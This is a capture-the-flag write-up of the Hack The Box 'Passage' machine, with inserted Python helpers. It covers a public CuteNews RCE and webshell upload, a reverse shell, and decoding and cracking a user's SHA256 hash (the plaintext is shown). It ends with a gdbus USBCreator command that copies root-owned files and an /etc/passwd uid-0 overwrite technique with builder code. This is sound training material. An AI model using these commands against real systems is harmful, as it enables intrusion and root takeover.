
Passage

☕ 6 min read · ✍️ T4r0

https://www.hackthebox.eu/home/machines/profile/275

Summary

This box used a public exploit for the web application as the foothold. After getting the exploit working, I had to enumerate files on the system to reach user. The next step was a horizontal privesc to another user, then an unusual privesc to root via gdbus and the USBCreator D-Bus service.

Exploring the target

First things first, after deploying the box and getting an IP, I started with an nmap scan. I usually run two nmap scans: one to quickly grab the open ports, then one to enumerate the running services on those ports in more detail, so I ran the following two commands:

nmap -sS -T4 -Pn <IP>

To grab the open ports, then:

nmap -sC -sV -Pn -T4 -p <PORTS I GOT FROM PREV SCAN> <IP>

To enumerate service banners and versions, with the default script set.

This gave the following result (screenshot in the original post): only two ports open, 22 (ssh) and 80 (Apache).
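The two-scan habit described above is easy to automate: run the fast scan with grepable output (`-oG -`), pull the open ports out of it, and build the slower `-sC -sV` scan restricted to exactly those ports. The example below is added here and is not code from the original post; the grepable output it parses is a constructed sample, and the target IP in it is an assumption.

```python
import re
import shlex

# Constructed sample of `nmap -sS -T4 -Pn -oG - <IP>` output, for illustration only.
# It is not the scan result from the original post.
SAMPLE_GREPABLE = """\
# Nmap 7.91 scan initiated as: nmap -sS -T4 -Pn -oG - 10.10.10.206
Host: 10.10.10.206 ()\tStatus: Up
Host: 10.10.10.206 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (997)
# Nmap done at ... -- 1 IP address (1 host up) scanned in 5.00 seconds
"""

# One entry in the "Ports:" field looks like 22/open/tcp//ssh///
PORT_RE = re.compile(r"(\d+)/(open|closed|filtered|open\|filtered)/(tcp|udp)")


def open_ports(grepable: str, proto: str = "tcp") -> list:
    """Return the sorted, de-duplicated list of open ports of one protocol from -oG output."""
    ports = set()
    for line in grepable.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        for port, state, p in PORT_RE.findall(line):
            if state == "open" and p == proto:
                ports.add(int(port))
    return sorted(ports)


def service_scan_cmd(target: str, ports: list) -> str:
    """Build the second, slower scan command restricted to the ports the first scan found."""
    if not ports:
        raise ValueError("no open ports found, nothing to enumerate")
    plist = ",".join(str(p) for p in ports)
    # shlex.quote keeps a hostname with odd characters from being interpreted by the shell
    return f"nmap -sC -sV -Pn -T4 -p {plist} {shlex.quote(target)}"


if __name__ == "__main__":
    found = open_ports(SAMPLE_GREPABLE)
    print("open tcp ports:", found)
    print(service_scan_cmd("10.10.10.206", found))
```

In practice the first scan is run with `-oG -` and piped into `open_ports`; the printed second command is what gets executed next. Closed and filtered ports are deliberately dropped so the version scan does not waste time on them.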

Foothold

After nmap, it was pretty obvious we had to direct our attention to the Apache server on port 80, since the only other open port was ssh, which gives us nothing without credentials. Opening the site in a browser showed some kind of news site that even had an RSS feed. I always check the page source, and did the same here: the mailto: link leaked the domain name, passage.htb, and a possible username I took note of: nadav.

I added the IP-domain pair to /etc/hosts. Still reading the source, there are tons of links pointing to the /CuteNews path: the CSS file path, the JS path, and so on. Opening http://passage.htb/CuteNews shows a login form; CuteNews is a news management system, something like a "WordPress for news". I tried logging in as nadav with a few simple passwords, which didn't work. Next, I looked up CuteNews with searchsploit and found quite a few exploits, which looked very promising. The site even leaks its version number in the footer: 2.1.2.

When I originally did the box, I decided to use the exploit at php/webapps/48458.txt. It can be mirrored into the current directory with:

searchsploit -m php/webapps/48458.txt

This is a set of manual instructions for uploading a file, so by following it we can upload a PHP shell and get RCE. I embedded a PHP shell in a PNG image's metadata with exiftool (the upload check only looks at the image signature, not at the rest of the content), changed the .png extension to .php in Burp, and the shell was uploaded.

Now that I'm writing this up, I decided to use php/webapps/48800.py instead. When the box came out this exploit either didn't work or wasn't available yet, I'm not sure which, but it works now, and running it is a lot easier than crafting an image-based PHP webshell by hand. It can be mirrored with:

searchsploit -m php/webapps/48800.py

I ran the exploit with

python3 48800.py

and when it asks for a URL, give just the site root:

http://passage.htb

This drops us into a shell on the machine as www-data. I switched to a bash reverse shell instead, since the exploit's shell felt a bit unstable: I fetched a bash script containing the reverse shell with wget and ran it with bash. Don't forget to start a listener on the attack box first!

User

Looking at /home, we can see two users: paul and nadav.
One should always enumerate the webserver directory for usernames, passwords, database credentials, hashes and the like. That is exactly how I found the next clue, in an interesting file at /var/www/html/CuteNews/cdata/users/lines.

It contained records stored as base64. I decoded them and found one mentioning paul, which looked interesting because paul is a user on the system, as we just saw. The decoded records are PHP serialized arrays holding SHA256 password hashes, for nadav as well as for paul. I couldn't crack nadav's, but paul's cracked very quickly with rockyou and john.

The relevant base64 record:

YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19

Decoded (a PHP serialized array):

a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

The hash I cracked, from the "pass" field:

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

This is SHA256: 64 hex characters is the giveaway, but you can also start john on it without a format parameter, which prints its guesses, or run hash-identifier on it.

First I wrote it to a file. I usually echo with the -n switch so no trailing newline ends up in the file; a stray newline sometimes causes problems, usually when the file is later fed into encoding or hashing tools:

echo -n e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd > hash.john

After this, I ran john with the right format, the wordlist, and the hash file as its last argument, and it cracked the hash in under a second:

john --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt hash.john

The cracked password is: atlanta1
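The whole chain from the users file to the password can be reproduced offline: base64-decode the record, parse the PHP serialized array to get the username, email and "pass" field, then hash candidate words with SHA256 and compare. The block below is an added example, not code from the original post or from CuteNews; the PHP unserialize routine is my own minimal implementation covering only the types the record above uses, and the wordlist is a tiny constructed stand-in for rockyou.

```python
import base64
import hashlib

# The record quoted above from cdata/users/lines.
PAUL_RECORD_B64 = (
    "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6"
    "Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5o"
    "dGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2"
    "OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJi"
    "YW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19"
)

# Constructed stand-in for rockyou.txt so the example runs offline.
CONSTRUCTED_WORDLIST = ["123456", "password", "atlanta", "passage", "atlanta1", "nadav"]


def php_unserialize(data: bytes):
    """Minimal PHP unserialize() for the types CuteNews records use: a, s, i, b, N.
    Works on bytes because PHP's s:LEN: counts bytes, not characters."""
    def parse(i):
        t = data[i:i + 1]
        if t == b"N":                                   # N;
            return None, i + 2
        if t in (b"i", b"b"):                           # i:42;  b:1;
            end = data.index(b";", i)
            n = int(data[i + 2:end])
            return (bool(n) if t == b"b" else n), end + 1
        if t == b"s":                                   # s:LEN:"bytes";
            colon = data.index(b":", i + 2)
            n = int(data[i + 2:colon])
            start = colon + 2                           # skip :"
            s = data[start:start + n]
            if data[start + n:start + n + 2] != b'";':
                raise ValueError(f"bad string terminator at offset {start + n}")
            return s.decode("utf-8", "replace"), start + n + 2
        if t == b"a":                                   # a:COUNT:{key value key value ...}
            colon = data.index(b":", i + 2)
            count = int(data[i + 2:colon])
            j = colon + 2                               # skip :{
            out = {}
            for _ in range(count):
                k, j = parse(j)
                v, j = parse(j)
                out[k] = v
            if data[j:j + 1] != b"}":
                raise ValueError(f"bad array terminator at offset {j}")
            return out, j + 1
        raise ValueError(f"unsupported type {t!r} at offset {i}")

    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing bytes after serialized value")
    return value


def users_from_record(b64: str) -> list:
    """Decode one base64 line keyed by 'name' (as the record above is) into user dicts."""
    rec = php_unserialize(base64.b64decode(b64))
    return [{"user": u, "email": f.get("email"), "hash": f.get("pass")}
            for u, f in rec.get("name", {}).items()]


def crack_sha256(hexhash: str, words) -> str:
    """Return the first word whose unsalted SHA256 matches, or None (what john does with Raw-SHA256)."""
    target = hexhash.lower()
    for w in words:
        if hashlib.sha256(w.encode()).hexdigest() == target:
            return w
    return None


if __name__ == "__main__":
    for u in users_from_record(PAUL_RECORD_B64):
        print(u["user"], u["email"], u["hash"], "->", crack_sha256(u["hash"], CONSTRUCTED_WORDLIST))
```

Unsalted SHA256 is why this cracks in well under a second even with the full rockyou: one hash computation per candidate, no per-user salt, and the whole users file can be attacked in a single pass.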

Since the hash was associated with paul in the decoded record, we can try to ssh in as paul, only to find that password authentication is disabled. No problem: we can simply su to paul from our www-data shell with that password.

That gave us the user flag!

Root

First of all, to be able to root I had to become nadav. This part took quite a while and felt a little guessy, but it wasn't too bad. After looking around for a while, paul's ~/.ssh/authorized_keys turns out to contain a key belonging to nadav. From that we make an assumption: paul's key is probably also in nadav's authorized_keys. If so, we should be able to log in as nadav from the box itself by running:

ssh nadav@localhost

We are in as nadav!

I did a lot of root enumeration but found nothing unusual of the typical kind: no interesting hidden files, backups or SUID binaries. There was one interesting service running: USBCreator. As it turned out, it was only running because someone else was doing the box at the same time (I did it on release). One can still find this privesc path without that hint by enumerating the .cache folder in nadav's home directory, or by reading nadav's vim history file.

The following article is a great writeup of this vulnerability: https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

HackTricks also covers it, and that is where the .ibus folder in ~/.cache becomes a recognisable hint: https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation

The final payload I used, which asks the USBCreator D-Bus service (running as root) to copy /root/root.txt to a path I control:

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /tmp/.a/result.txt true

After running this, root.txt had been copied to /tmp/.a/result.txt, and we could read its content as nadav.

One might wonder how to get a root shell with this method, since it only lets us copy files as root. One way: copy /etc/passwd somewhere writable such as /tmp, append a new user with uid 0 and a password hash to the copy, then use the same Image call to overwrite the original /etc/passwd with it (keep the untouched copy so you can restore it afterwards). Now we can log in as the new user and, bang, we have a root shell.
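The passwd edit above is simple but has two sharp edges: every field must be colon-free and the line must have exactly seven fields, or login breaks for everyone, and a password hash placed directly in the second field (instead of the usual `x` pointing at /etc/shadow) is exactly what a defender should grep for afterwards. The block below is an added example, not code from the original post; it builds the line, shows the check a defender runs over the file, and uses a constructed passwd excerpt and a placeholder hash (a real one would come from something like `openssl passwd -6`, which this code does not run).

```python
# Constructed /etc/passwd excerpt for illustration; not copied from the box.
PASSWD_ORIGINAL = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
"""

# Placeholder with the shape of a SHA512-crypt hash ($6$salt$...); not a valid hash.
PLACEHOLDER_HASH = "$6$saltsalt$" + "A" * 86


def passwd_entry(name, crypt_hash, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """Build one passwd line; refuses fields that would corrupt the colon-separated format."""
    for field in (name, crypt_hash, home, shell):
        if ":" in field or "\n" in field or field == "":
            raise ValueError(f"invalid passwd field: {field!r}")
    return f"{name}:{crypt_hash}:{uid}:{gid}:{name}:{home}:{shell}"


def add_entry(passwd_text, entry):
    """Append an entry, keeping the file newline-terminated so the next tool reads it cleanly."""
    return passwd_text.rstrip("\n") + "\n" + entry + "\n"


def parse_passwd(passwd_text):
    """Split into 7-field records, raising on anything malformed (a broken file locks everyone out)."""
    records = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        records.append(fields)
    return records


def uid0_accounts(passwd_text):
    """Defender-side check: every account that is root-equivalent, whatever its name."""
    return [f[0] for f in parse_passwd(passwd_text) if f[2] == "0"]


def inline_hash_accounts(passwd_text):
    """Defender-side check: accounts whose password field holds a hash instead of x/*/!."""
    return [f[0] for f in parse_passwd(passwd_text) if f[1] not in ("x", "*", "!", "!!", "")]


if __name__ == "__main__":
    modified = add_entry(PASSWD_ORIGINAL, passwd_entry("pwned", PLACEHOLDER_HASH))
    print("uid 0 accounts:", uid0_accounts(modified))
    print("inline hashes :", inline_hash_accounts(modified))
```

On the attacking side, `modified` is what gets written to the copy in /tmp and then pushed over /etc/passwd with the Image method; on the defending side, any result from `uid0_accounts` other than `["root"]`, or any result at all from `inline_hash_accounts`, is worth an incident ticket.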

Written by T4r0, Penetration Tester